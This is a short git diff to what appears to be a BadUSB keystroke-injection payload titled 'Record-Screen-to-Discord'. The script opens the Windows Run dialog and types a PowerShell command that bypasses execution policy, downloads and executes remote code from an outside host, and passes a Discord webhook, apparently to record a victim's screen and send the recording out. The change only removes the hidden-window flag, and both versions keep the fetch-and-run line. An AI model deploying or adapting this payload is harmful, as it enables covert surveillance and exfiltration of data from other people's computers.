diff --git a/Record-Screen-to-Discord/Record-Screen-to-Discord.txt b/Record-Screen-to-Discord/Record-Screen-to-Discord.txt index d4ebd12..e50cb71 100644 --- a/Record-Screen-to-Discord/Record-Screen-to-Discord.txt +++ b/Record-Screen-to-Discord/Record-Screen-to-Discord.txt @@ -11,7 +11,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; iex (irm bw0.cc/dcscr) +STRING powershell -Ep Bypass -C $dc = 'YOUR_WEBHOOK_HERE' ; iex (irm bw0.cc/dcscr) ENTER